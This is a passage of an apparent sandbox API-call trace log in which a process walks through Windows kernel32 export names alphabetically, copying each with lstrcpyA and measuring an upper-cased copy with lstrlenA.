lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.808] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.808] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.808] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.808] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.808] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.808] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.808] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.808] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.809] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.809] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.809] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.809] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.809] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.809] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.809] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.809] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.809] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.809] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.809] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.809] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.809] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.809] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.810] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.810] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.810] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.810] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.810] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.810] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.810] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.810] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.810] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.810] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.810] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.810] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.810] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.810] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.810] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.810] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.810] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.810] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.810] lstrlenA (lpString="COPYFILEA") returned 9 [0078.810] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.811] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.811] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.811] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.811] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.811] lstrlenA (lpString="COPYFILEW") returned 9 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.811] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.811] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.811] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.811] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.811] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.811] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.811] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.811] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.811] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.811] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.811] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.811] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.811] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.811] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.811] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.812] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.812] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.812] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.812] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.812] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.812] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.812] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.812] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.812] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.812] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.812] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.812] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.812] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.812] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.812] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.812] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.812] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.812] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.812] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.813] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.813] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.813] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.813] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.813] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.813] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.813] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.813] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.813] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.813] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.813] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.813] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.813] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.813] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.813] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.813] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.813] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.813] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.814] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.814] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.814] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.814] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.814] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.814] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.814] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.814] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.814] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.814] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.814] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.814] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.814] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.814] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.814] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.814] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.814] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.814] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.814] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.814] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.815] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.815] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.815] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.815] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.815] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.815] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.815] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.815] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.815] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.815] lstrlenA 